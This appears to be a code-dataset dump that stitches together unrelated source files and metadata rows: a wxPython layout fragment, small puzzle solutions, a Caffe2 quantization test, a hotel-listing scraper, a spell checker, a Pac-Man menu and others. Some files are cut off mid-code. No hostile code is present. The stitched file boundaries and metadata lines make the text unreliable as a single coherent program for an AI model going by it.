image2 = wx.Bitmap(self.image)
self.bitmap_1 = wx.StaticBitmap(self, wx.ID_ANY, image2)
sizer_1 = wx.BoxSizer(wx.VERTICAL) #sizers
sizer_3 = wx.BoxSizer(wx.HORIZONTAL) # list boxes1
sizer_2 = wx.BoxSizer(wx.VERTICAL) #Radiobox, bitmap
sizer_4 = wx.BoxSizer(wx.HORIZONTAL) # Radiobox, buttons
sizer_5 = wx.BoxSizer(wx.HORIZONTAL) #Butons
sizer_4.Add(self.radio_box_1, 2, wx.EXPAND, 0)
sizer_4.Add(sizer_5, 1, wx.EXPAND, 0)
sizer_5.Add(self.backbutton, 1, wx.EXPAND, 0)
sizer_5.Add(self.savebutton, 1, wx.EXPAND, 0)
sizer_2.Add(sizer_4, 1, wx.EXPAND, 0)
sizer_2.Add(self.bitmap_1, 0, wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL, 0)
sizer_1.Add(sizer_2, 1, wx.EXPAND, 0)
sizer_3.Add(self.list_box_3, 1, wx.EXPAND, 0)
sizer_3.Add(self.list_box_2, 1, wx.EXPAND, 0)
sizer_1.Add(sizer_3, 1, wx.EXPAND, 0)
self.SetSizer(sizer_1)
self.Layout()
if __name__ == "__main__":
gettext.install("app")
app = wx.App(0)
wx.InitAllImageHandlers()
frame_1 = Stats(None, wx.ID_ANY, "")
app.SetTopWindow(frame_1)
frame_1.Show()
app.MainLoop()
| [
"s1082434@student.hsleiden.nl"
] | s1082434@student.hsleiden.nl |
878597de95a64033248db2cb30ff1f88acb2fabc | 46c3fe721977e4626658b802ef1b6c25853b709a | /String validators.py | 559d24860c983e1bf0ad0013eb9c58b66d2daa47 | [] | no_license | rishabhgupta03/Hacker-Rank-python | 97decac9c3f91c98908085482fdf2ae9a55fe02a | fc74e6ffe5905cc0c985520f0e8a766f54241424 | refs/heads/master | 2022-11-27T18:51:29.202123 | 2020-07-16T16:46:01 | 2020-07-16T16:46:01 | 266,185,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | s=input()
print (any(i.isalnum() for i in s))
print (any(i.isalpha() for i in s))
print (any(i.isdigit() for i in s))
print (any(i.islower() for i in s))
print (any(i.isupper() for i in s))
| [
"noreply@github.com"
] | rishabhgupta03.noreply@github.com |
106b49f1d09d2c07ec615d4ff6eada48156bac0f | ed3c924c42baa3ab825a482efc15f85a32c06eaa | /boj16649.py | 471eee9a27c32f61b4009e52d88b52912bb2b19c | [] | no_license | JoinNova/baekjoon | 95e94a7ccae51103925e515d765ebda7b6fffeed | 33b900696ecf2a42b8e452fdeae6ee482143e37e | refs/heads/master | 2020-04-16T22:25:31.577968 | 2019-04-28T04:25:24 | 2019-04-28T04:25:24 | 165,966,949 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | #boj16649 Building a Stair
def stair(cube):
cnt=cube
row=(cube+1)//2
print(row+1)
pic='.'*(row+1)+'\n'
for i in range(row):
for j in range(row):
if j==0 or i==row-1:
pic+='o';cnt-=1
elif cube%2==0 and i==row-2 and j==1:
pic+='o';cnt-=1;
else:
pic+='.'
pic+='.\n'
print(pic.strip())
#print(cnt)
n=int(input())
if n==2:print(-1)
else:stair(n)
| [
"noreply@github.com"
] | JoinNova.noreply@github.com |
3f861b0b4904d9b72b34ade2c2fae8f9932ec493 | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/testData/inspections/GoogleDocStringRemoveKeywordVararg.py | 2ff1604bc7d53ec8b7c1992b258b97e54edb35a8 | [
"Apache-2.0"
] | permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 57 | py | def f():
"""
Args:
**kwar<caret>gs:
""" | [
"mikhail.golubev@jetbrains.com"
] | mikhail.golubev@jetbrains.com |
65e9e8ebbf9a9682f5fb9acfd790fad23e123824 | 99e44f844d78de330391f2b17bbf2e293bf24b1b | /pytorch/caffe2/quantization/server/group_norm_dnnlowp_op_test.py | b6acc900437ce89c4bd5c4ea17a400c9b8d47839 | [
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] | permissive | raghavnauhria/whatmt | be10d57bcd6134dd5714d0c4058abd56a1b35a13 | c20483a437c82936cb0fb8080925e37b9c4bba87 | refs/heads/master | 2022-12-04T05:39:24.601698 | 2019-07-22T09:43:30 | 2019-07-22T09:43:30 | 193,026,689 | 0 | 1 | MIT | 2022-11-28T17:50:19 | 2019-06-21T03:48:20 | C++ | UTF-8 | Python | false | false | 4,517 | py | from __future__ import absolute_import, division, print_function, unicode_literals
import collections
import caffe2.python.hypothesis_test_util as hu
import hypothesis.strategies as st
import numpy as np
from caffe2.python import core, dyndep, utils, workspace
from caffe2.quantization.server import utils as dnnlowp_utils
from dnnlowp_test_utils import check_quantized_results_close
from hypothesis import given
dyndep.InitOpsLibrary("//caffe2/caffe2/quantization/server:dnnlowp_ops")
workspace.GlobalInit(["caffe2", "--caffe2_omp_num_threads=11"])
class DNNLowPOpGroupNormTest(hu.HypothesisTestCase):
@given(
N=st.integers(1, 4),
G=st.integers(2, 4),
K=st.integers(2, 12),
H=st.integers(4, 16),
W=st.integers(4, 16),
order=st.sampled_from(["NCHW", "NHWC"]),
in_quantized=st.booleans(),
out_quantized=st.booleans(),
weight_quantized=st.booleans(),
**hu.gcs_cpu_only
)
def test_dnnlowp_group_norm(
self,
N,
G,
K,
H,
W,
order,
in_quantized,
out_quantized,
weight_quantized,
gc,
dc,
):
C = G * K
X = np.random.rand(N, C, H, W).astype(np.float32) * 5.0 - 1.0
if order == "NHWC":
X = utils.NCHW2NHWC(X)
gamma = np.random.rand(C).astype(np.float32) * 2.0 - 1.0
beta = np.random.randn(C).astype(np.float32) - 0.5
Output = collections.namedtuple("Output", ["Y", "op_type", "engine"])
outputs = []
op_engine_list = [
("GroupNorm", ""),
("GroupNorm", "DNNLOWP"),
("Int8GroupNorm", "DNNLOWP"),
]
for op_type, engine in op_engine_list:
net = core.Net("test_net")
do_quantize = "DNNLOWP" in engine and in_quantized
do_dequantize = "DNNLOWP" in engine and out_quantized
do_quantize_weight = (
engine == "DNNLOWP" and weight_quantized and len(outputs) > 0
)
if do_quantize:
quantize = core.CreateOperator(
"Quantize", ["X"], ["X_q"], engine=engine, device_option=gc
)
net.Proto().op.extend([quantize])
if do_quantize_weight:
int8_given_tensor_fill, gamma_q_param = dnnlowp_utils.create_int8_given_tensor_fill(
gamma, "gamma_q"
)
net.Proto().op.extend([int8_given_tensor_fill])
X_q_param = dnnlowp_utils.choose_quantization_params(X.min(), X.max())
int8_bias_tensor_fill = dnnlowp_utils.create_int8_bias_tensor_fill(
beta, "beta_q", X_q_param, gamma_q_param
)
net.Proto().op.extend([int8_bias_tensor_fill])
group_norm = core.CreateOperator(
op_type,
[
"X_q" if do_quantize else "X",
"gamma_q" if do_quantize_weight else "gamma",
"beta_q" if do_quantize_weight else "beta",
],
["Y_q" if do_dequantize else "Y"],
dequantize_output=0 if do_dequantize else 1,
group=G,
order=order,
is_test=True,
engine=engine,
device_option=gc,
)
if do_quantize_weight:
# When quantized weight is provided, we can't rescale the
# output dynamically by looking at the range of output of each
# batch, so here we provide the range of output observed from
# fp32 reference implementation
dnnlowp_utils.add_quantization_param_args(group_norm, outputs[0][0])
net.Proto().op.extend([group_norm])
if do_dequantize:
dequantize = core.CreateOperator(
"Dequantize", ["Y_q"], ["Y"], engine=engine, device_option=gc
)
net.Proto().op.extend([dequantize])
self.ws.create_blob("X").feed(X, device_option=gc)
self.ws.create_blob("gamma").feed(gamma, device_option=gc)
self.ws.create_blob("beta").feed(beta, device_option=gc)
self.ws.run(net)
outputs.append(
Output(Y=self.ws.blobs["Y"].fetch(), op_type=op_type, engine=engine)
)
check_quantized_results_close(outputs, atol_scale=2.0)
| [
"rnauhria@gmail.com"
] | rnauhria@gmail.com |
ac08339f54af9d89f25a52c9f16329136ab711df | 5dd5828ae5c021ebe41348dfbaf1a1aa38319177 | /crawler/booking/crawler.py | c17ca545224b54836a4bfb2addf3e707cde79005 | [] | no_license | whoait/crawldata | 9655bab7d237f7ac3b448dc8735077545878f528 | 7943d47ed1b141808c971265d77018f9da8eed02 | refs/heads/master | 2020-04-11T04:06:56.573595 | 2015-08-21T08:19:23 | 2015-08-21T08:19:23 | 161,501,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,811 | py | """
Base Crawler Rules
Rules help the crawler locate links in webpages
"""
import time
from datetime import datetime, timedelta
from selenium import webdriver
from BeautifulSoup import BeautifulSoup
import urllib2
import requests
import json
from ..base.crawler import BaseCrawler
from ..string_util import setuplogger
class BookingCrawler(BaseCrawler):
def __init__(self, site_base_url, mongodb):
self.site_base_url = site_base_url
self.logger = setuplogger(loggername='booking_crawler')
self.driver = None
self.hotels_per_page =15
self.db = mongodb
def __del__(self):
# self.driver.quit().
pass
# returns list of URLs of all hotels to parse
# expected contents of meta_dict:
# - full_name (of city)
# - city_ID (tripadvisor)
# - country (name)
def crawl_hotels(self, base_url, metadata_dict={}):
hotel_dict_list = []
hotel_limit = -1
page_count = 1
tries = 0
max_tries = 3
search_url = base_url
while True:
try:
soup = BeautifulSoup(
requests.get(search_url).text)
except:
self.logger.info("cannot retrieve page - exiting")
break
self.logger.info("parsing list of hotels from {0}".format(search_url))
for listing in soup.find(id="hotellist_inner").findAll("div", "sr_item clearfix"):
try:
url = self.site_base_url + listing.find("h3").find("a")['href'].split("?")[0]
hotel_id = listing["data-hotelid"]
hotel_dict_list.append({
"url": url,
"hotel_id": hotel_id,
"source": "Booking"
})
except:
self.logger.info("No url present in listing {0}".format(listing))
# look for next page url
if soup.find("a", "paging-next"):
search_url = soup.find("a", "paging-next")['href']
else:
break
self.logger.info("hotel url list has {0} entries".format(len(hotel_dict_list)))
return hotel_dict_list
def get_hotels(self, base_url, metadata_dict={}):
if self.db.hotel_url.find({'source': 'Booking'}).count() == 0:
hotel_dict_list = self.crawl_hotels(base_url, metadata_dict)
for item in hotel_dict_list:
self.db.hotel_url.insert(item)
return list(self.db.hotel_url.find(
{'source': 'Booking'},
{'url': 1, 'hotel_id': 1}))
# we will use json to crawl the reviews.
# :return - max int - page number
def crawl_reviews(self, base_url, metadata_dict):
return None
| [
"heroitsme@gmail.com"
] | heroitsme@gmail.com |
5d5f8447dfe2cd287eede766f94ffe04e154a4ab | 908c89f2d28df0ebbbdb15895efd5087aaf7e914 | /stuff/lectureCode/Python/solveq.py | b1ac07bd92b559650061085e56a3a8d3fac3b0ee | [
"MIT"
] | permissive | kit-ifm/moofeKIT | 1f1ae137f5345303c3fa0e29aaa70b697173fae6 | e999ce25b7e37ae35439c43c988b54df3de93055 | refs/heads/main | 2023-04-09T12:49:58.331894 | 2022-09-29T15:21:50 | 2022-09-29T15:21:50 | 536,644,907 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,224 | py | import numpy as np
#from scipy.sparse.linalg import spsolve
from scikits.umfpack import spsolve, splu
def solveq(K, F, bc):
## Loesen des lineare Gleichungssystems unter Beruecksichtiung Dirichlet-Randbedingungen
#
# q = solveq(K,F,bc)
#
# q: Loesungsvektor
# K: Steifigkeitsmatrix
# F: Lastvektor
# bc: Dirichlet-Freiheitsgrade
#
# bc = [idxDiri1 valueDiri1
# idxDiri2 valueDiri2
# :
# idxDiriN valueDiriN]
if bc.size != 0:
# Eingaben einlesen
dofDiri = (bc[:, 0] - np.ones(bc[:, 0].shape)).astype('i')
qDiri = bc[:, 1]
# Freiheitsgrade mit Dirichlet-Raender identifizieren
nDof = np.size(F)
DOSOLVE = np.full(nDof, True)
DOSOLVE[dofDiri] = False
# Nach Freiheitsgraden, die nicht Dirichlet-Rand sind loesen, bei
# anderen Werten Dirichletrand einsetzen
q = np.zeros(np.shape(K)[0])
q[DOSOLVE] = spsolve(K[np.ix_(DOSOLVE, DOSOLVE)], F[DOSOLVE] - np.atleast_2d(K[np.ix_(DOSOLVE, np.logical_not(DOSOLVE))] @ qDiri).T)
q[np.logical_not(DOSOLVE)] = qDiri
else:
# Nach allen Werten loesen
q = np.linalg.solve(K, F)
return q
| [
"marlon.franke@kit.edu"
] | marlon.franke@kit.edu |
26f2a0c1553f577042410902902d21b7314ccb2a | 4835164a9fd8bd6a3c58ecb698e06fbda9527a1d | /venv/mainMenu.py | 5a7f0d3c9ec3343ddbb7794dfb911e5bb48f58c4 | [] | no_license | Kaine-R/Pac-Man | 15fb99e9df3d6b0956b09729b4f14054c1135799 | 06c8de255b8f4de28dc8d55938a0e307c209aa19 | refs/heads/master | 2020-04-01T22:49:39.203774 | 2018-10-19T04:55:25 | 2018-10-19T04:55:25 | 153,728,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,200 | py | import pygame
import pygame.font
from introduceGhosts import IntroGhosts
class Menu():
def __init__(self, screen, settings):
self.screen, self.settings = screen, settings
self.names = IntroGhosts(screen, settings)
self.scores = [50000, 30000, 10000, 5000, 2000, 1000, 500, 300, 200, 100, 0]
self.font = pygame.font.SysFont(None, 80, True, True)
self.smallFont = pygame.font.SysFont(None, 48)
self.title = self.font.render("PACMAN", True, (250, 250, 250))
self.titleRect = self.title.get_rect()
self.titleRect.x, self.titleRect.y = 2* settings.screenWidth /7, settings.screenHeight /9
self.bg = (0, 0, 0)
self.timer = 0
self.showHS = False
self.pacImage = [pygame.image.load("image/pacman3.png"), pygame.image.load("image/pacman2.png"), pygame.image.load("image/pacman1.png")]
self.pacRect = self.pacImage[0].get_rect()
self.pacRect.x, self.pacRect.y = - settings.screenWidth /4, settings.screenHeight /3
self.pacDirection = 1
self.allGhostImage = pygame.image.load("image/ghostAll.png")
self.allGhostBlueImage = pygame.image.load("image/ghostAllBlue.png")
self.allEyesImage = pygame.image.load("image/eyeAll.png")
self.allEyesRect = self.allEyesImage.get_rect()
self.allEyesRect.x, self.allEyesRect.y = - settings.screenWidth /2, settings.screenHeight /3 + 10
self.allGhostRect = self.allGhostImage.get_rect()
self.allGhostRect.x, self.allGhostRect.y = - settings.screenWidth /2, settings.screenHeight /3
def checkShowHS(self, tempBool):
self.showHS = tempBool
def update(self):
if self.timer > 900:
self.timer = 0
else:
self.timer += 1
self.pacRect.x += 2 * self.pacDirection
self.allGhostRect.x += 2 * self.pacDirection
self.allEyesRect.x += 2 * self.pacDirection
if self.pacRect.x >= self.settings.screenWidth *2:
self.pacDirection = -1
self.flipPac()
self.allEyesImage = pygame.transform.flip(self.allEyesImage, True, False)
elif self.pacRect.x <= 0 - self.settings.screenWidth:
self.pacDirection = 1
self.flipPac()
self.allEyesImage = pygame.transform.flip(self.allEyesImage, True, False)
def flipPac(self):
self.pacImage[0] = pygame.transform.flip(self.pacImage[0], True, False)
self.pacImage[1] = pygame.transform.flip(self.pacImage[1], True, False)
self.pacImage[2] = pygame.transform.flip(self.pacImage[2], True, False)
def blit(self):
self.screen.fill(self.bg)
self.screen.blit(self.title, self.titleRect)
if not self.showHS:
if self.timer %31 <= 10:
self.screen.blit(self.pacImage[0], self.pacRect)
elif self.timer %31 <= 20:
self.screen.blit(self.pacImage[1], self.pacRect)
elif self.timer %31 <= 30:
self.screen.blit(self.pacImage[2], self.pacRect)
if self.pacDirection == 1:
self.screen.blit(self.allGhostImage, self.allGhostRect)
else:
self.screen.blit(self.allGhostBlueImage, self.allGhostRect)
self.screen.blit(self.allEyesImage, self.allEyesRect)
self.names.blit()
else:
self.showScores()
def showScores(self):
self.prepScores()
for i in range(len(self.scores)):
self.screen.blit(self.scoreImages[i], self.scoreRect[i])
def prepScores(self):
self.scoreImages = []
self.scoreRect = []
xShift, yShift = 100, 200
for score in self.scores:
tempImage = self.smallFont.render("Score: " + str(score), True, (250, 250, 250))
self.scoreImages.append(tempImage)
tempRect = tempImage.get_rect()
tempRect.x, tempRect.y = xShift, yShift
yShift += 40
self.scoreRect.append(tempRect)
def changeScores(self, newScore):
self.scores.append(newScore)
self.scores.sort(reverse=True)
self.scores.pop(len(self.scores) -1)
| [
"Kaine-R@users.noreply.github.com"
] | Kaine-R@users.noreply.github.com |
16fa6b97aea49a877fecdcd880eb57ed74def130 | 97259280efe6466030c10d2d03d0d02b8d1c4a19 | /OOP/lesson_6.py | 5c4d3501b09177dc73d4449f0f73c9be7ea0c8c8 | [] | no_license | Esentur/Python_course | f3923c2ef2bb67ec49b8f20a0c74831fbda11812 | c8ab335f24e01b1017bef176dfa23149ca5e80d3 | refs/heads/master | 2023-02-27T06:51:28.298164 | 2021-01-30T18:43:32 | 2021-01-30T18:43:32 | 332,705,285 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 864 | py | class Shape:
x=0
y=0
def __init__(self,x,y):
self.x=x
self.y=y
def printXY(self):
print('('+str(self.x)+'; '+str(self.y)+')')
def draw(self):
print('Рисуем фигуру')
class Circle(Shape):
r=0
def __init__(self,x,y,r):
Shape.__init__(self,x,y)
self.r=r
def draw(self):
print('Рисуем окружность (x=',self.x,';y=',self.y,';r=',self.r,';)',sep='')
class Rectangle (Shape):
w=0
h=0
def __init__(self,x,y,w,h):
Shape.__init__(self,x,y)
self.w=w
self.h=h
def draw(self):
print('Рисуем прямоугольник (x=',self.x,';y=',self.y,';w=',self.w,';h=',self.h,';)',sep='')
s=Shape(5,7)
s.draw()
c=Circle(10,20,5)
c.draw()
r=Rectangle(0,0,30,50)
r.w=35
r.draw()
s.printXY()
c.printXY()
r.printXY() | [
"esenturdildebekov8@gmail.com"
] | esenturdildebekov8@gmail.com |
d52a03e2fbb19f94c5e6fb5e3e8ae6b17c26290e | 4584763bde3ecc6fb90aeb65ce341ab286ec4888 | /applications/python.py | 2d76fc6571879da96b39878139092aa48af050a2 | [] | no_license | stefangelova/python-testing | 6800e1a108052730c59bbf5a36600e0b1af86846 | 350e6a76a3f71ad8787dbbebb0825a6571933267 | refs/heads/master | 2021-07-08T16:48:16.888689 | 2020-02-19T15:27:02 | 2020-02-19T15:27:02 | 241,637,133 | 0 | 0 | null | 2021-04-20T19:22:06 | 2020-02-19T14:06:47 | Python | UTF-8 | Python | false | false | 100 | py | import math
number = float(input("Enter a number:"))
answer = math.sqrt(number)
print(answer) | [
"s.angelova.14@aberdeen.ac.uk"
] | s.angelova.14@aberdeen.ac.uk |
2095829a72d1af19ee231c7ec670bf65766c274d | fd625e2ea155455c96261c8656a51be22fe420c8 | /Python/euler035.py | 4400059a3e93b485f3924881b3fe16cd51c435bb | [
"MIT"
] | permissive | AnuragAnalog/project_euler | 9b84a6aa0061ad4582c8d0059c3c1eaddd844fd2 | 8babbefbd5b7008ad24509f24a9d5f50ba208f45 | refs/heads/master | 2021-12-12T12:07:29.338791 | 2021-11-01T04:26:44 | 2021-11-01T04:26:44 | 210,749,964 | 6 | 16 | MIT | 2021-11-01T04:26:45 | 2019-09-25T03:44:37 | Python | UTF-8 | Python | false | false | 1,240 | py | #!/usr/bin/python3
"""
The number, 197, is called a circular prime because all rotations of the digits: 197, 971, and 719, are themselves prime.
There are thirteen such primes below 100: 2, 3, 5, 7, 11, 13, 17, 31, 37, 71, 73, 79, and 97.
How many circular primes are there below one million?
"""
import numpy as np
def isprime(num: int) -> bool:
for i in range(2, int(np.sqrt(num))+1):
if num%i == 0:
return False
return True
def rotate(num: int) -> set:
rot = {num}
length = len(str(num))
k = 0
while k < length:
tmp = list(str(num))
dig = tmp[0]
tmp[:] = tmp[1:]
tmp.append(dig)
num = ''.join(tmp)
rot.add(int(num))
k = k + 1
return rot
def euler35() -> int:
tot = 0
c_primes = [2]
flag = False
for i in range(3, 10**6, 2):
if isprime(i):
flag = True
tmp = set()
cps = rotate(i)
for x in cps:
if isprime(x):
tmp.add(x)
else:
flag = False
break
if flag:
c_primes.extend(list(tmp))
return len(set(c_primes))
tot = euler35()
print(tot)
| [
"anurag.peddi1998@gmail.com"
] | anurag.peddi1998@gmail.com |
cd51951988cc830caa77f03f2eeb40d2fcc4bf9b | 209775edcf637e0298e3d675cd4691222f0c80fd | /models/attention.py | 948f8135922664fe52468d3c0f0947b901e5ad77 | [
"MIT"
] | permissive | henghuiding/attMPTI | 8e1bcef35005c945978ad503001afb5bed09c011 | d046b36458a5b0c57b4783e597bb180fccc4ddb2 | refs/heads/main | 2023-04-10T03:04:13.075270 | 2021-04-17T13:58:04 | 2021-04-17T13:58:04 | 358,939,393 | 1 | 0 | MIT | 2021-04-17T17:19:19 | 2021-04-17T17:19:19 | null | UTF-8 | Python | false | false | 1,662 | py | """Self Attention Module
Author: Zhao Na, 2020
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
class SelfAttention(nn.Module):
def __init__(self, in_channel, out_channel=None, attn_dropout=0.1):
"""
:param in_channel: previous layer's output feature dimension
:param out_channel: size of output vector, defaults to in_channel
"""
super(SelfAttention, self).__init__()
self.in_channel = in_channel
if out_channel is not None:
self.out_channel = out_channel
else:
self.out_channel = in_channel
self.temperature = self.out_channel ** 0.5
self.q_map = nn.Conv1d(in_channel, out_channel, 1, bias=False)
self.k_map = nn.Conv1d(in_channel, out_channel, 1, bias=False)
self.v_map = nn.Conv1d(in_channel, out_channel, 1, bias=False)
self.dropout = nn.Dropout(attn_dropout)
def forward(self, x):
"""
:param x: the feature maps from previous layer,
shape: (batch_size, in_channel, num_points)
:return: y: attentioned features maps,
shape: (batch_size, out_channel, num_points)
"""
q = self.q_map(x) # (batch_size, out_channel, num_points)
k = self.k_map(x) # (batch_size, out_channel, num_points)
v = self.v_map(x) # (batch_size, out_channel, num_points)
attn = torch.matmul(q.transpose(1,2) / self.temperature, k)
attn = self.dropout(F.softmax(attn, dim=-1))
y = torch.matmul(attn, v.transpose(1,2)) # (batch_size, num_points, out_channel)
return y.transpose(1,2) | [
"zhaona311@gmail.com"
] | zhaona311@gmail.com |
1cb72016f9c456c6294bdc18ee3bb15e889e96e0 | fcb7030ae6da44d6f36a9a166a614952a66937db | /11 user's functions/03 - max 2.py | b7b20317783541603811f5a4b06304305483c54f | [] | no_license | Immaculated/educational_basic | 4b931bb515343a67bf2132a9b97c029c8b8e7e4c | 8ef0de14f0acc12ac172dcaf0ece8bd81b6ade83 | refs/heads/main | 2023-04-22T01:22:54.999075 | 2021-05-02T05:38:26 | 2021-05-02T05:38:26 | 320,326,316 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | def max_two(a,b):
return a if a > b else b
print(max_two(3,5)) | [
"noreply@github.com"
] | Immaculated.noreply@github.com |
a7114ae73b29642ae1b3b76a8eca40595de9439d | df7f13ec34591fe1ce2d9aeebd5fd183e012711a | /hata/discord/embed/embed/tests/test__parse_author.py | fb71e365acb11fa7c73817ca0ef5c02ff77884b6 | [
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | HuyaneMatsu/hata | 63e2f6a2d7a7539fd8f18498852d9d3fe5c41d2e | 53f24fdb38459dc5a4fd04f11bdbfee8295b76a4 | refs/heads/master | 2023-08-20T15:58:09.343044 | 2023-08-20T13:09:03 | 2023-08-20T13:09:03 | 163,677,173 | 3 | 3 | Apache-2.0 | 2019-12-18T03:46:12 | 2018-12-31T14:59:47 | Python | UTF-8 | Python | false | false | 481 | py | import vampytest
from ...embed_author import EmbedAuthor
from ..fields import parse_author
def test__parse_author():
"""
Tests whether ``parse_author`` works as intended.
"""
author = EmbedAuthor(name = 'hell')
for input_data, expected_output in (
({}, None),
({'author': None}, None),
({'author': author.to_data()}, author),
):
output = parse_author(input_data)
vampytest.assert_eq(output, expected_output)
| [
"re.ism.tm@gmail.com"
] | re.ism.tm@gmail.com |
706ac6d17f47c1b5d78a4e905d3dbcc02cb0258e | 7bc0db81c58d320a8a143941a46b608b457741ab | /WordDescription.py | 1202b7134ab48bd628f590b9c23e9c135653a15d | [] | no_license | zephyr-fun/Visualization-for-Hidden-Man | 3224a75b38c1a98f1e00659035770ccf07f5ff42 | a8f26aed827499f63172da0ca951d0c766c2ea9f | refs/heads/master | 2020-03-31T13:43:31.137446 | 2018-10-10T07:38:52 | 2018-10-10T07:38:52 | 152,267,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,484 | py | import pickle
from os import path
import jieba
import matplotlib.pyplot as plt
from wordcloud import WordCloud, STOPWORDS, ImageColorGenerator
comment = []
with open('xie_zhengsingle.txt',mode='r',encoding='utf-8') as f:
rows = f.readlines()
for row in rows:
if len(row.split(',')) == 5:
comment.append(row.split(',')[4].replace('\n',''))
comment_after_split = jieba.cut(str(comment),cut_all=False)
wl_space_split= " ".join(comment_after_split)
#导入背景图
backgroud_Image = plt.imread('C:\\Users\\16208\\Desktop\\focus\\1.jpg')
stopwords = STOPWORDS.copy()
#可以加多个屏蔽词
stopwords.add("电影")
stopwords.add("一部")
stopwords.add("一个")
stopwords.add("没有")
stopwords.add("什么")
stopwords.add("有点")
stopwords.add("这部")
stopwords.add("这个")
stopwords.add("不是")
stopwords.add("真的")
stopwords.add("感觉")
stopwords.add("觉得")
stopwords.add("还是")
#设置词云参数
#参数分别是指定字体、背景颜色、最大的词的大小、使用给定图作为背景形状
wc = WordCloud(width=1024,height=768,background_color='white',
mask=backgroud_Image,font_path="C:\simhei.ttf",
stopwords=stopwords,max_font_size=400,
random_state=50)
wc.generate_from_text(wl_space_split)
img_colors= ImageColorGenerator(backgroud_Image)
wc.recolor(color_func=img_colors)
plt.imshow(wc)
plt.axis('off')#不显示坐标轴
plt.show()
#保存结果到本地
wc.to_file('quan2.jpg') | [
"noreply@github.com"
] | zephyr-fun.noreply@github.com |
c66e82d6a81b1b34eab48480c0a02eba499d2ddf | 6b3354450b15d0cc42d2beb44ec922aae9d5ac5a | /word_check.py | a3fead6b82acc92286c4e9dc028cbc7f8c914f55 | [] | no_license | goosebones/spellotron | b946a0cb94d32654985a394eb99a7dd5ef46d034 | 2cb70fca1b0ff2b801dba52f1243f4afc1de79a6 | refs/heads/master | 2022-11-13T21:45:21.824589 | 2020-07-08T18:37:26 | 2020-07-08T18:37:26 | 278,166,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,070 | py | """
author: Gunther Kroth gdk6217@rit.edu
file: word_check.py
assignment: CS1 Project
purpose: spell check a word
"""
# required modules
from dataclasses import dataclass
import adjacent
import missed
import extra
import string_modify
# golbal variables ------------------------------------------------------------
LEGAL_WORD_FILE = "american-english.txt"
KEY_ADJACENCY_FILE = "keyboard-letters.txt"
ALPHABET = tuple(chr(code) for code in range(ord("a"), ord("z") +1))
LEGAL_WORDS = dict()
ADJACENT_KEYS = dict()
# legal word dictionary
def legal_words_maker(word_file):
""" creates dictionary of legal_words
key and value are identical
dictionary keys are used throughout
:param word_file: file containing dictionary words
preconditions:
word_file has one word per line
postconditions:
LEGAL_WORDS dict is populated
"""
f = open(word_file)
for line in f:
line = line.strip()
LEGAL_WORDS[line] = line
legal_words_maker(LEGAL_WORD_FILE)
# adjacent keys
def adjacent_letter_maker(letter_file):
""" creates dictionary of adjacent keys
each letter is a key
list of every key adjacent to the letter is value
:param letter_file: file with adjacent keys
preconditions:
letter_file has one set of keys per line
postconditions:
ADJACENT_KEYS is populated
"""
f = open(letter_file)
for line in f:
key = line[0]
value = line.split()
ADJACENT_KEYS[key] = value
adjacent_letter_maker(KEY_ADJACENCY_FILE)
# words that have been checked
printed_words = []
# key = incorrect word, value = correct version
fixed_words = dict()
# words that were unable to be fixed
unknown_words = []
# number of words analyzed
word_count = 0
# word dataclass --------------------------------------------------------------
@dataclass
class Word:
""" dataclass for a word
word = read word
front = front punctuation
back = back punctuation
capital = first letter capital
"""
__slots__ = "word", "front", "back", "capital"
word: str
front: str
back: str
capital: bool
def word_maker(word):
""" returns instance of Word dataclass
read word is word
punctuation is empty
capital is False
:param word: word to use to create instance
"""
return Word(word, "", "", False)
# word analyze ----------------------------------------------------------------
def line_check(line):
""" analyzes lines that are read
analyzes each word in the line using word_check
:param line: line of words to check
preconditions:
line is list of words
"""
global word_count
for word in line:
word_check(word)
word_count += 1
def word_check(word):
""" spell checks a word
accounts for symbols, decimals, punctuation, capitals
used 3 methods to spell check an incorrect word
return None is used as an exit method
:param word: word to analyze
"""
word = word_maker(word)
# 2. decimal digits
for ch in word.word:
if ch.isdigit() == True:
printed_words.append(word.word)
return None
# 3. strip punctuation
word.word, word.front, word.back = string_modify.punctuation_strip(word.word)
# word is all punctuation
if len(word.word) == 0:
punct_word = word.front + word.word + word.back
printed_words.append(punct_word)
return None
# 4. spell check
if word.word in LEGAL_WORDS:
printed_words.append(word.front + word.word + word.back)
return None
# 5. upper case
if word.word[0].isupper() == True:
word.capital = True
if word.capital == True:
first_letter = word.word[0]
word.word = string_modify.lower_case(word.word)
if word.word in LEGAL_WORDS:
word.word = first_letter + word.word[1:]
printed_words.append(word.front + word.word + word.back)
return None
# 6. check using methods
# adjacent key press
adj_bool, fixed_word = adjacent.adjacent_key_press(word.word)
if adj_bool == True:
new = word.front + fixed_word + word.back
old = word.front + word.word + word.back
# 7. case is restored
if word.capital == True:
new = word.front + string_modify.upper_case(fixed_word) + word.back
old = word.front + string_modify.upper_case(word.word) + word.back
printed_words.append(new)
fixed_words[old] = new
return None
# missed key press
miss_bool, fixed_word = missed.missing_key_press(word.word)
if miss_bool == True:
new = word.front + fixed_word + word.back
old = word.front + word.word + word.back
# 7. case is restored
if word.capital == True:
new = word.front + string_modify.upper_case(fixed_word) + word.back
old = word.front + string_modify.upper_case(word.word) + word.back
printed_words.append(new)
fixed_words[old] = new
return None
